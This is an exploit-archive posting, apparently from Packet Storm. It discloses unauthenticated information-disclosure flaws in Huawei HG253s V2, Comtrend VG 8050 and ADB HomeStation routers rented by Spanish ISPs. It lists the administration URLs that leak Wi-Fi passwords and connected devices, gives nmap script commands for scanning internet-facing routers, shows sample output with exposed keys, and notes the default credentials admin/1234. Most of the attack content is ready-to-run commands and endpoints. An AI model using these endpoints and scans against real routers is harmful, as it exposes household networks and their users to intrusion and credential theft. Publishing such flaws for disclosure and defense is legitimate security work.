what you don't know can hurt you

Huawei HG253s V2 Information Disclosure

Huawei HG253s V2 Information Disclosure
Posted Nov 24, 2015
Authored by Vicen Dominguez

Huawei HG253s V2 suffers from a remote information disclosure vulnerability.

tags | exploit, remote, info disclosure
MD5 | d162a8902298a8b934472b47c12f2cd5

Huawei HG253s V2 Information Disclosure

Change Mirror Download
Huawei HG253s v2
Vodafone-Spain is starting to rent a new Huawei HG253v2 router to the
spanish costumers. This new router is coming with a new firmware version.
This bug has been found by @VicenDominguez

Vulnerability

Basically, it is not validating the session cookie in some administration
webpages. So, It is possible to get direct information from those urls in
any router open to internet.

http://IPhtml_253s/api/ntwk/WlanBasic
http://IP/html_253s/api/system/diagnose_internet
http://IP/html_253s/api/system/hostinfo?type=ethhost
http://IP/html_253s/api/system/hostinfo?type=guesthost
http://IP/html_253s/api/system/hostinfo?type=homehost
http://IP/html_253s/api/system/hostinfo?type=wifihost
http://IP/html_253s/api/system/wizardcfg

Usage

nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-vodafone-hua253s:
| SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
| Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP:
192.168.0.XX

Comtrend VG 8050

Telefonica-Spain is starting to rent a new Comtrend VG 8050 router to the
spanish costumers. This new router is coming with a new firmware version.
This bug has been found by @DaniLabs

Vulnerability

Basically, it is not validating the session cookie in some administration
webpages. So, It is possible to get direct information from those urls in
any router open to internet.

http://IP/getWifiInfo.jx
http://IP/listDevices.jx
http://IP/infoApplications.jx

Usage

nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-comtrend-vg-8050:
| SSID: MOVISTAR_XXX
| Cipher Algorithm: WPA
| Password WEP:
| Password WPA: gTU3NkXE44RYjuM2RrxM
| Password WPA2:
| Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X

ADB P.DGA4001N (HomeStation)
Telefonica-Spain is starting to rent a new ADB P.DGA4001N router to the
spanish costumers. This new router is coming with a new firmware version.
This bug has been found by @DaniLabs

Vulnerability

Basically, it is not validating the session cookie in some administration
webpages. So, It is possible to get direct information from those urls in
any router open to internet.

http://IP/getWifiInfo.jx
http://IP/listDevices.jx
http://IP/infoApplications.jx

Add the credentials by default are admin / 1234

Usage

nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-homestation:
| SSID: WLAN_HOME
| Cipher Algorithm: WEP
| Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X

Here the scripts https://github.com/DaniLabs/scripts-nse


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close